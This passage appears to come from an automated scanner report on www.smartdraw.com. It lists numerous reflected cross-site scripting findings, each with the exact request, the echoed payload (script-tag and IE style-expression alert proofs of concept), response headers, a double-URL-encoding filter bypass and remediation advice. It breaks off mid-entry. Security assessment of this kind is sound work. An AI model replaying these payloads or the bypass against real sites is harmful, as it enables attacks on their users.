HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/ Set-Cookie: ASP.NET_SessionId=gjwvvma5ouzgwz45mccvo0yz; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049 was submitted in the REST URL parameter 1. This input was echoed as 7e0fd"style="x:expression(alert(1))"c7b5f3c9049 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /7e0fd%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c7b5f3c9049/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/ Set-Cookie: ASP.NET_SessionId=muhiv555hhwxlq45i4d30a2z; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8711 Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db was submitted in the REST URL parameter 2. This input was echoed as ba1e3"style="x:expression(alert(1))"9c5fd0e07db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads/x22ba1e3%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229c5fd0e07db HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/ Set-Cookie: ASP.NET_SessionId=jpp44c45no3vndyg0eiqfdaq; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8774 Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 was submitted in the REST URL parameter 2. This input was echoed as 53118"style="x:expression(alert(1))"c23085e6306 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /downloads/53118%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522c23085e6306 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:00 GMT; path=/ Set-Cookie: ASP.NET_SessionId=slhjyjfmrcmjlrjjdpmdykfr; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8753 Connection: close
3.144. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c9a5"style="x:expression(alert(1))"c2aa39074d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads/x22?5c9a5"style%3d"x%3aexpression(alert(1))"c2aa39074d2=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ssgwag55ef2suzf5q24jnl45; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8795 Connection: close
3.145. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/downloads/x22
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43ce2"style="x:expression(alert(1))"09bdff38fc4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /downloads/x22?43ce2"style%3d"x%3aexpression(alert(1))"09bdff38fc4=1 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:41 GMT; path=/ Set-Cookie: ASP.NET_SessionId=tew4y345qibicu55t1rjfuqe; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8795 Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44 was submitted in the REST URL parameter 1. This input was echoed as 94da6"style="x:expression(alert(1))"861bf406f44 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /94da6%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522861bf406f44/charts/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:10 GMT; path=/ Set-Cookie: ASP.NET_SessionId=3yzxhc55ehds33jqb4uatink; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8760 Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3 was submitted in the REST URL parameter 1. This input was echoed as a48df"style="x:expression(alert(1))"d7925e086c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /examplesa48df%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d7925e086c3/charts/x22 HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:30:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:05 GMT; path=/ Set-Cookie: ASP.NET_SessionId=ty0lqe55q5mcnibk2sdorqzz; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8816 Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498 was submitted in the REST URL parameter 1. This input was echoed as 4a543"style="x:expression(alert(1))"ac716871498 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /4a543%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522ac716871498/reviews HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate Date: Thu, 03 Feb 2011 20:29:31 GMT Content-Length: 8739 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:31 GMT; path=/ Set-Cookie: ASP.NET_SessionId=3c4tc255quiohy55truamgmu; path=/; HttpOnly Pragma: no-cache Expires: Thu, 03 Feb 2011 20:29:31 GMT Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1 was submitted in the REST URL parameter 1. This input was echoed as 7bfab"style="x:expression(alert(1))"fd877cbaba1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product7bfab%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522fd877cbaba1/reviews HTTP/1.1 Host: www.smartdraw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:29:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:27 GMT; path=/ Set-Cookie: ASP.NET_SessionId=irozqj45lpljwj55wgoccn55; path=/; HttpOnly Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 8788 Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d was submitted in the REST URL parameter 1. This input was echoed as 7aea0"><script>alert(1)</script>c7ddeeb9a3d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product7aea0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec7ddeeb9a3d/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:43 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1fckz3ilanwcrr45tvw5eu55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8949
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339 was submitted in the REST URL parameter 1. This input was echoed as cc399"><script>alert(1)</script>aa008f34339 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cc399%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaa008f34339/reviews?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:45 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0vufwvz10dn1v0up3yasccey; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8900
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 was submitted in the REST URL parameter 2. This input was echoed as a75f4"style="x:expression(alert(1))"4417cefb817 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fv4eqq55u13gyheum3ewifj0; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323 was submitted in the REST URL parameter 2. This input was echoed as 96803"><script>alert(1)</script>dfbbf862323 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:51 GMT
Content-Length: 8900
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=smkoxh55k01vvq55ighs2efj; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:51 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a was submitted in the REST URL parameter 2. This input was echoed as f5bf0"><script>alert(1)</script>a7aeb62331a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/reviewsf5bf0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7aeb62331a?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b4ntfe451a35d0z3actuq255; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8949
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 was submitted in the REST URL parameter 2. This input was echoed as 6bd2b"style="x:expression(alert(1))"f1b2d917b08 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /product/reviews6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:36 GMT
Content-Length: 8788
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sktfbrnh1dtwviaawiverx45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:36 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5812"><script>alert(1)</script>d208eaaaa24 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?id=349540/x22/x3eSmartDrawc5812"><script>alert(1)</script>d208eaaaa24 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b82"><script>alert(1)</script>2e1c8977753 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /product/reviews?id=74b82"><script>alert(1)</script>2e1c8977753 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.158. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartdraw.com
Path:
/product/reviews
Issue detail
